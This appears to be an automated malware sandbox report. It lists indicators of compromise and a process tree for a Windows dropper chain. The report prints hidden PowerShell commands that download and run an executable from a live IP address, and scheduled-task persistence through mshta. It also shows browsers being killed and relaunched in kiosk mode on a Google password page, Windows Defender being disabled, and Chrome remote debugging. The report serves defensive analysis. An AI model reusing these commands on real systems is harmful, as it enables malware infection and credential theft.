\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 6 IoCs
pid Process 13168 taskkill.exe 6912 taskkill.exe 4340 taskkill.exe 6380 taskkill.exe 6812 taskkill.exe 1692 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133873799693062515" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5008 schtasks.exe 4480 schtasks.exe 13184 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3788 1k62M0.exe 3788 1k62M0.exe 4924 rapes.exe 4924 rapes.exe 5040 2C5168.exe 5040 2C5168.exe 5040 2C5168.exe 5040 2C5168.exe 5040 2C5168.exe 5040 2C5168.exe 4504 3d01I.exe 4504 3d01I.exe 4504 3d01I.exe 4504 3d01I.exe 4504 3d01I.exe 4504 3d01I.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 4504 3d01I.exe 4504 3d01I.exe 4504 3d01I.exe 4504 3d01I.exe 5064 powershell.exe 5064 powershell.exe 5064 powershell.exe 5064 powershell.exe 3540 qWvzIGs.exe 3540 qWvzIGs.exe 6540 1626bd4685.exe 6540 1626bd4685.exe 4844 TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE 4844 TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE 4504 3d01I.exe 4504 3d01I.exe 6540 1626bd4685.exe 6540 1626bd4685.exe 6540 1626bd4685.exe 6540 1626bd4685.exe 6740 powershell.exe 6740 powershell.exe 6740 powershell.exe 2536 AppLaunch.exe 2536 AppLaunch.exe 2536 AppLaunch.exe 2536 AppLaunch.exe 5688 powershell.exe 5688 powershell.exe 5688 powershell.exe 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe 2840 powershell.exe 2840 powershell.exe 2840 powershell.exe 6372 074cc99761.exe 6372 074cc99761.exe 4504 3d01I.exe 4504 3d01I.exe 6924 483d2fa8a0d53818306efeb32d3.exe 6924 483d2fa8a0d53818306efeb32d3.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 8132 3315e253e7.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 2328 msedge.exe 2328 msedge.exe 7200 chrome.exe 7200 chrome.exe 7200 chrome.exe 7200 chrome.exe 2128 msedge.exe 2128 msedge.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeShutdownPrivilege 3948 chrome.exe Token: SeCreatePagefilePrivilege 3948 chrome.exe Token: SeShutdownPrivilege 3948 chrome.exe Token: SeCreatePagefilePrivilege 3948 chrome.exe Token: SeShutdownPrivilege 3948 chrome.exe Token: SeCreatePagefilePrivilege 3948 chrome.exe Token: SeShutdownPrivilege 3948 chrome.exe Token: SeCreatePagefilePrivilege 3948 chrome.exe Token: SeShutdownPrivilege 3948 chrome.exe Token: SeCreatePagefilePrivilege 3948 chrome.exe Token: SeShutdownPrivilege 3948 chrome.exe Token: SeCreatePagefilePrivilege 3948 chrome.exe Token: SeShutdownPrivilege 3948 chrome.exe Token: SeCreatePagefilePrivilege 3948 chrome.exe Token: SeShutdownPrivilege 3948 chrome.exe Token: SeCreatePagefilePrivilege 3948 chrome.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeDebugPrivilege 3540 qWvzIGs.exe Token: SeDebugPrivilege 3540 qWvzIGs.exe Token: SeDebugPrivilege 6740 powershell.exe Token: SeDebugPrivilege 5688 powershell.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 6912 taskkill.exe Token: SeDebugPrivilege 4340 taskkill.exe Token: SeDebugPrivilege 6380 taskkill.exe Token: SeDebugPrivilege 6812 taskkill.exe Token: SeDebugPrivilege 1692 taskkill.exe Token: SeDebugPrivilege 5644 firefox.exe Token: SeDebugPrivilege 5644 firefox.exe Token: SeDebugPrivilege 8132 3315e253e7.exe Token: SeShutdownPrivilege 7200 chrome.exe Token: SeCreatePagefilePrivilege 7200 chrome.exe Token: SeShutdownPrivilege 7200 chrome.exe Token: SeCreatePagefilePrivilege 7200 chrome.exe Token: SeShutdownPrivilege 7200 chrome.exe Token: SeCreatePagefilePrivilege 7200 chrome.exe Token: SeShutdownPrivilege 7200 chrome.exe Token: SeCreatePagefilePrivilege 7200 chrome.exe Token: SeShutdownPrivilege 7200 chrome.exe Token: SeCreatePagefilePrivilege 7200 chrome.exe Token: SeShutdownPrivilege 7200 chrome.exe Token: SeCreatePagefilePrivilege 7200 chrome.exe Token: SeShutdownPrivilege 7200 chrome.exe Token: SeCreatePagefilePrivilege 7200 chrome.exe Token: SeDebugPrivilege 3276 tasklist.exe Token: SeDebugPrivilege 4292 tasklist.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3788 1k62M0.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 3948 chrome.exe 1968 eb95445557.exe 1968 eb95445557.exe 1968 eb95445557.exe 2328 msedge.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 6244 3d6d3eafb1.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 7200 chrome.exe 7200 chrome.exe 7200 chrome.exe 7200 chrome.exe 7200 chrome.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 1968 eb95445557.exe 1968 eb95445557.exe 1968 eb95445557.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 6244 3d6d3eafb1.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 5644 firefox.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe 6244 3d6d3eafb1.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5644 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2432 wrote to memory of 5576 2432 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 86 PID 2432 wrote to memory of 5576 2432 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 86 PID 2432 wrote to memory of 5576 2432 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 86 PID 5576 wrote to memory of 3788 5576 g0t53.exe 88 PID 5576 wrote to memory of 3788 5576 g0t53.exe 88 PID 5576 wrote to memory of 3788 5576 g0t53.exe 88 PID 3788 wrote to memory of 4924 3788 1k62M0.exe 91 PID 3788 wrote to memory of 4924 3788 1k62M0.exe 91 PID 3788 wrote to memory of 4924 3788 1k62M0.exe 91 PID 5576 wrote to memory of 5040 5576 g0t53.exe 92 PID 5576 wrote to memory of 5040 5576 g0t53.exe 92 PID 5576 wrote to memory of 5040 5576 g0t53.exe 92 PID 2432 wrote to memory of 4504 2432 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 97 PID 2432 wrote to memory of 4504 2432 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 97 PID 2432 wrote to memory of 4504 2432 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 97 PID 4504 wrote to memory of 3948 4504 3d01I.exe 99 PID 4504 wrote to memory of 3948 4504 3d01I.exe 99 PID 3948 wrote to memory of 4044 3948 chrome.exe 100 PID 3948 wrote to memory of 4044 3948 chrome.exe 100 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 4064 3948 chrome.exe 102 PID 3948 wrote to memory of 4064 3948 chrome.exe 102 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1480 3948 chrome.exe 101 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 PID 3948 wrote to memory of 1500 3948 chrome.exe 103 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe"C:\Users\Admin\AppData\Local\Temp\cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g0t53.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g0t53.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5576 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k62M0.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k62M0.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe"C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Users\Admin\AppData\Local\Temp\10331670101\eb95445557.exe"C:\Users\Admin\AppData\Local\Temp\10331670101\eb95445557.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn kx3tWmabXXw /tr "mshta C:\Users\Admin\AppData\Local\Temp\ajUaUlrVr.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:5412 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn kx3tWmabXXw /tr "mshta C:\Users\Admin\AppData\Local\Temp\ajUaUlrVr.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5008
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ajUaUlrVr.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064 -
C:\Users\Admin\AppData\Local\TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE"C:\Users\Admin\AppData\Local\TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4844
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10331680121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:4892 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:6912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "sA9RQmaUEkX" /tr "mshta \"C:\Temp\sxHhtewnv.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4480
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\sxHhtewnv.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6924
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331690101\1626bd4685.exe"C:\Users\Admin\AppData\Local\Temp\10331690101\1626bd4685.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6540
-
-
C:\Users\Admin\AppData\Local\Temp\10331700101\074cc99761.exe"C:\Users\Admin\AppData\Local\Temp\10331700101\074cc99761.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6372
-
-
C:\Users\Admin\AppData\Local\Temp\10331710101\3d6d3eafb1.exe"C:\Users\Admin\AppData\Local\Temp\10331710101\3d6d3eafb1.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6244 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6812
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:6672
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5644 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2040 -prefsLen 27099 -prefMapHandle 2044 -prefMapSize 270279 -ipcHandle 2132 -initialChannelId {e2d91bc5-d305-48cc-8d72-1dba6b591ee3} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:4528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2544 -prefsLen 27135 -prefMapHandle 2548 -prefMapSize 270279 -ipcHandle 2552 -initialChannelId {73836ae9-edf2-47fe-ac79-131b7cba7fce} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:4736
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3876 -prefsLen 25164 -prefMapHandle 3880 -prefMapSize 270279 -jsInitHandle 3884 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3892 -initialChannelId {635c7cde-4b14-43b7-8234-1d3f54e676e8} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:4788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4064 -prefsLen 27276 -prefMapHandle 4068 -prefMapSize 270279 -ipcHandle 4140 -initialChannelId {d375b0f4-f3b1-4637-af19-270b0daf4ac0} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:5600
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3232 -prefsLen 34775 -prefMapHandle 3172 -prefMapSize 270279 -jsInitHandle 3216 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3196 -initialChannelId {62c3a5bd-5c5f-4afb-9fb4-780477be8539} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:4564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5040 -prefsLen 35012 -prefMapHandle 5044 -prefMapSize 270279 -ipcHandle 5028 -initialChannelId {db4e0331-4b42-416a-90e2-e9214e2c991c} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:7684
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5344 -prefsLen 32952 -prefMapHandle 5348 -prefMapSize 270279 -jsInitHandle 5352 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5360 -initialChannelId {5ffe2466-fc7e-4b47-8e17-d9a1769a32f5} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:7892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5588 -prefsLen 32952 -prefMapHandle 5584 -prefMapSize 270279 -jsInitHandle 5580 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5612 -initialChannelId {b512e0a7-9a84-41d1-ac74-145ce435bfb9} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:7940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5832 -prefsLen 32952 -prefMapHandle 5836 -prefMapSize 270279 -jsInitHandle 5840 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5372 -initialChannelId {cf4b1b22-65ce-4abe-8e38-f1ef166ec72a} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:8116
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331720101\3315e253e7.exe"C:\Users\Admin\AppData\Local\Temp\10331720101\3315e253e7.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8132
-
-
C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe"C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:236
-
-
C:\Users\Admin\AppData\Local\Temp\10331750101\1ee60c3a9f.exe"C:\Users\Admin\AppData\Local\Temp\10331750101\1ee60c3a9f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:560 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
